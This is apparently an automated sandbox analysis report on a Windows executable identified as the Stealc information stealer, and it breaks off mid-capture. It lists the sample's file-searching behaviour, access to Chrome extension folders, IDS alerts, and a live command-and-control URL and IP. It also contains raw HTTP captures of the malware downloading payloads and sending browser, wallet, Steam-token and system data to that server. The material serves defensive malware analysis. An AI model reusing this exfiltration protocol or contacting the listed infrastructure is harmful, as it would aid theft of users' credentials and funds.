Source: C:\Users\user\Desktop\b4s45TboUL.exe

Unpacked PE file: 0.2.b4s45TboUL.exe.400000.1.unpack

Source: b4s45TboUL.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\b4s45TboUL.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 87.106.236.48:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: my_library.pdbU source: b4s45TboUL.exe, 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmp, b4s45TboUL.exe, 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: b4s45TboUL.exe, b4s45TboUL.exe, 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmp, b4s45TboUL.exe, 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: HIIDGCGCBF.exe, 00000004.00000002.1986378243.00007FF68D548000.00000040.00000001.01000000.00000008.sdmp, updater.exe, 0000002A.00000002.2010831986.00007FF7586B8000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: HIIDGCGCBF.exe, 00000004.00000002.1986378243.00007FF68D548000.00000040.00000001.01000000.00000008.sdmp, updater.exe, 0000002A.00000002.2010831986.00007FF7586B8000.00000040.00000001.01000000.0000000A.sdmp

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004140F0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E530
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE40
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414B60
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EE20
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00413B00
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DF10
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_004147C0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DB80
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F7B0

Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 45.91.200.39:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 45.91.200.39:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 45.91.200.39:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 45.91.200.39:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 45.91.200.39:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 45.91.200.39:80
Source: Network traffic	Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.4:49730 -> 45.91.200.39:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://45.91.200.39/eaa194fa594ff9c2.php
Source: Malware configuration extractor	URLs: http://45.91.200.39/eaa194fa594ff9c2.php

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 30 Oct 2024 18:47:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00

Source: global traffic	HTTP traffic detected: GET /tmpp/chrome_131.exe HTTP/1.1Host: gosp.clinicavertigen.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.91.200.39Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDBHost: 45.91.200.39Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 38 31 33 30 44 37 38 38 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="hwid"E68130D788EC2273848308------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="build"LogsDiller------AFCFHJJECAEHJJKEHIDB--
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFIDAAEHIEGCBFIDBFHost: 45.91.200.39Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 2d 2d 0d 0a Data Ascii: ------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="message"browsers------DBKFIDAAEHIEGCBFIDBF--
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFHIIEHIEGDHJJJKFIIHost: 45.91.200.39Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 2d 2d 0d 0a Data Ascii: ------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="message"plugins------JKFHIIEHIEGDHJJJKFII--
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIIIHost: 45.91.200.39Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 2d 2d 0d 0a Data Ascii: ------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="message"fplugins------GHIDGDHCGCBAKFHIIIII--
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 45.91.200.39Content-Length: 5199Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cb9cc10e175e1537/sqlite3.dll HTTP/1.1Host: 45.91.200.39Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 45.91.200.39Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDHHost: 45.91.200.39Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 2d 2d 0d 0a Data Ascii: ------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="file"------IIIECAAKECFHIECBKJDH--
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECGIIIDAKJDHJKFHIEBHost: 45.91.200.39Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 2d 2d 0d 0a Data Ascii: ------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="message"wallets------JECGIIIDAKJDHJKFHIEB--
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKFHost: 45.91.200.39Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 2d 2d 0d 0a Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="message"files------HIJEGDBGDBFIJKECBAKF--
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJKHost: 45.91.200.39Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="file"------CGIEGHJEGHJKFIEBFHJK--
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBHost: 45.91.200.39Content-Length: 113023Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBFIIIEHCFHJKFHDHDAHost: 45.91.200.39Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 